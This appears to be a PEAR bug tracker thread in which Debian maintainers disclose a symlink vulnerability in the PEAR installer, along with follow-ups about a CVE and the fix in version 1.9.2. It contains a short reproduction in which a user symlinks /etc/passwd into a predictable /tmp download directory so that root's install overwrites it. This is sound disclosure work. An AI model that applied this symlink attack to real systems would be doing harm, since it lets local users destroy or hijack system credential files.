Description: ------------ There's symlink vulnerability when doing PEAR install. PEAR should really be using $(mktemp) for it's directories like download_dir, cache_dir and tmp_dir, and check whether the directory doesn't exists. Test script: --------------- # pear config-show | grep /tmp PEAR Installer cache directory cache_dir /tmp/pear/cache PEAR Installer download download_dir /tmp/buildd/php5-5.3.3/pear-build-download PEAR Installer temp directory temp_dir /tmp/pear/temp # ls -ld /tmp/buildd/php5-5.3.3/pear-build-download drwxr-xr-x 2 ondrej ondrej 4096 Nov 14 14:17 /tmp/buildd/php5-5.3.3/pear-build-download # su - ondrej $ cd /tmp/buildd/php5-5.3.3/pear-build-download $ ln -s /etc/passwd package.xml $ cat package.xml root:x:0:0:root:/root:/bin/bash [...] $ logout # pear install Net_Socket downloading Net_Socket-1.0.10.tgz ... Starting to download Net_Socket-1.0.10.tgz (5,429 bytes) .....done: 5,429 bytes install ok: channel://pear.php.net/Net_Socket-1.0.10 # head /etc/passwd <?xml version="1.0" encoding="UTF-8"?> <package packagerversion="1.9.1" version="2.0" xmlns="http://pear.php.net/dtd/package-2.0" xmlns:tasks="http://pear.php.net/dtd/tasks-1.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://pear.php.net/dtd/tasks-1.0 http://pear.php.net/dtd/tasks-1.0.xsd http://pear.php.net/dtd/package-2.0 http://pear.php.net/dtd/package-2.0.xsd"> <name>Net_Socket</name> <channel>pear.php.net</channel> <summary>Network Socket Interface</summary> <description>Net_Socket is a class interface to TCP sockets. It provides blocking and non-blocking operation, with different reading and writing modes (byte-wise, block-wise, line-wise and special formats like network byte-order ip addresses).</description> <lead> Expected result: ---------------- Not overwriting system files. Not vulnerable to symlink attack. Actual result: -------------- Overwritten /etc/passwd just by creating right directories and symlinks.

This should probably get a CVE. It's already tracked under: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=546164 http://security-tracker.debian.org/tracker/TEMP-0546164-014755 Bug first reported by Raphael Geisert (one of Debian php5 maintainers). Ondrej, on behalf of Debian PHP5 maintainers

A fix is coming soon, sorry for the delays. As for the CVE, is that something you (or any of the Debian people) want to take care of?

Hi, thanks for working on the fix. You should probably request a CVE, since you are the owner of the project. I guess you can ask on internals how to do that. Ondrej

This bug has been fixed in SVN. If this was a documentation problem, the fix will appear on pear.php.net by the end of next Sunday (CET). If this was a problem with the pear.php.net website, the change should be live shortly. Otherwise, the fix will appear in the package's next release. Thank you for the report and for helping us make PEAR better. The fixes have been committed and an advisory will be posted when the release happens, in the next day or two. Look for the 1.9.2 release when it gets posted.